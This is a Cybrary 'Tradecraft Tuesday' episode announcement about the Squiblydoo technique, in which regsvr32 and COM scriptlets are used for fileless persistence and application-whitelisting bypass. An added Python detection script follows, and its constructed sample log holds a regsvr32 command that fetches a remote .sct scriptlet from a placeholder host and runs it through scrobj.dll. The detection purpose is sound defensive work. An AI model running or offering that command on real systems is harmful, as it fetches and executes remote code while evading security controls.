Tradecraft Tuesday – COM Scriptlets & the Squiblydoo Attack


Author: kylehanslovan | Published on May 3, 2016 | Views: 2604

Tradecraft Tuesday

What is Tradecraft Tuesday?

Every Tuesday at 12pm ET, Chris Bisnett and Kyle Hanslovan expose the techniques used by hackers. With their 20 combined years in offensive cyber security and digital forensics, Chris and Kyle cover a new topic each week in a LIVE video chat. These unrehearsed conversations allow anyone to join in, ask questions, and share their experiences from offensive and defensive perspectives. In case you miss an episode, each recorded session will be uploaded to Cybrary’s new CH4NN3L platform.

On this week’s episode, we’re diving into how hackers can use COM Scriptlets and Regsvr32.exe for fileless persistence, bypassing application whitelisting, and evading detection by endpoint security products. This tradecraft has been coined the “Squiblydoo” attack by Casey Smith (@subTee), who originally exposed the technique in early April. In a nutshell, Casey illustrated how Windows can natively run JScript/VBScript embedded into an XML file called a scriptlet with the help of Microsoft’s Regsvr32.exe application and the underlying COM subsystem. Furthermore, he shared how this scriptlet can be remotely fetched from a URL, leaving only a footprint in memory. With this tradecraft, hackers are able to ensure malicious code is automatically executed after a reboot – bypassing application whitelisting and antivirus products along the way. Join us to learn how it happens and what can be done to mitigate this nasty threat!
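The paragraph above describes the observable that defenders can key on: Regsvr32.exe being told to pull a scriptlet from a URL and hand it to the COM scriptlet handler. The following is an added example, not code from the episode, from Huntress Labs or from Cybrary. It runs a small detection over constructed process-creation records (field names Image, CommandLine and ParentImage are assumed to follow Sysmon Event ID 1; the URL and paths are placeholders). It flags three indicators of the Squiblydoo pattern: a remote http(s) target in the /i: argument, a reference to scrobj.dll (the Windows COM scriptlet handler), and the /n switch, which tells regsvr32 not to call DllRegisterServer and so is expected in scriptlet abuse but rare in legitimate DLL registration.

```python
"""Flag Squiblydoo-style regsvr32 scriptlet execution in process-creation logs.

Added illustration for defenders; the records below are constructed, not real
telemetry, and the field names follow Sysmon Event ID 1 by assumption.
"""
import re
from typing import Dict, List

# Constructed sample events. example.invalid is a placeholder host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # benign: an installer registering a local DLL
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
    },
    {   # suspicious: scriptlet fetched over HTTP through /i:, handled by scrobj.dll
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # suspicious: local scriptlet, still routed through scrobj.dll, spawned by Office
        "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s /n /i:C:\Users\Public\update.sct scrobj.dll",
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
    },
    {   # unrelated process: must be ignored
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# /i:<url> is the argument regsvr32 passes to the DLL's DllInstall entry point;
# an http(s) value there is the remote-fetch behaviour the episode describes.
REMOTE_SCRIPTLET = re.compile(r'/i:\s*"?https?://', re.IGNORECASE)
# scrobj.dll is the COM scriptlet handler that executes the JScript/VBScript.
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)
# /n suppresses DllRegisterServer; legitimate registration rarely uses it.
NO_REGISTER = re.compile(r"(^|\s)/n(\s|$)", re.IGNORECASE)


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Return the list of Squiblydoo indicators present in one event (empty if none)."""
    image = event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image != "regsvr32.exe":
        return []
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if REMOTE_SCRIPTLET.search(cmd):
        reasons.append("remote-scriptlet")
    if SCROBJ.search(cmd):
        reasons.append("scrobj.dll")
    if NO_REGISTER.search(cmd):
        reasons.append("no-dllregisterserver")
    return reasons


def find_squiblydoo(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Collect every regsvr32 event carrying at least one indicator."""
    findings: List[Dict[str, object]] = []
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            findings.append({
                "CommandLine": event.get("CommandLine", ""),
                "ParentImage": event.get("ParentImage", ""),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_squiblydoo(SAMPLE_EVENTS):
        print(f"[{', '.join(finding['reasons'])}] parent={finding['ParentImage']}")
        print(f"    {finding['CommandLine']}")
```

Because the scriptlet never has to touch disk, file-based antivirus has little to scan; command-line telemetry is where this technique is visible, so the check above is written against process-creation events rather than file writes. The parent image is carried through in each finding because a regsvr32 launched by an Office application or a script host is a stronger signal than one launched by an installer.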

Chris Bisnett
Chris Bisnett is a veteran information security researcher with more than a decade of experience in offensive and defensive cyber operations. While serving with the NSA RedTeam, he attacked government networks and systems to identify and remedy vulnerabilities. He is also a recognized Black Hat conference trainer and has taught his “Fuzzing For Vulnerabilities” course at several events around the world. Prior to founding Huntress Labs, Mr. Bisnett co-founded LegalConfirm, LLC where he led product design and development until the company was acquired in 2014.

Kyle Hanslovan
For the past 10 years, Kyle Hanslovan has supported defensive and offensive cyber operations in the U.S. Intelligence Community and currently is the CEO of Huntress Labs. He previously co-founded the defense consulting firm StrategicIO and actively participates in the ethical hacking community as a Black Hat conference trainer, STEM mentor, and Def Con CTF champion. Additionally, he serves in the Maryland Air National Guard as a Cyber Warfare Operator. With his strong background in technical leadership, software development, and malware analysis, Mr. Hanslovan seeks to significantly raise the bar for malicious actors to successfully conduct cyber attacks.
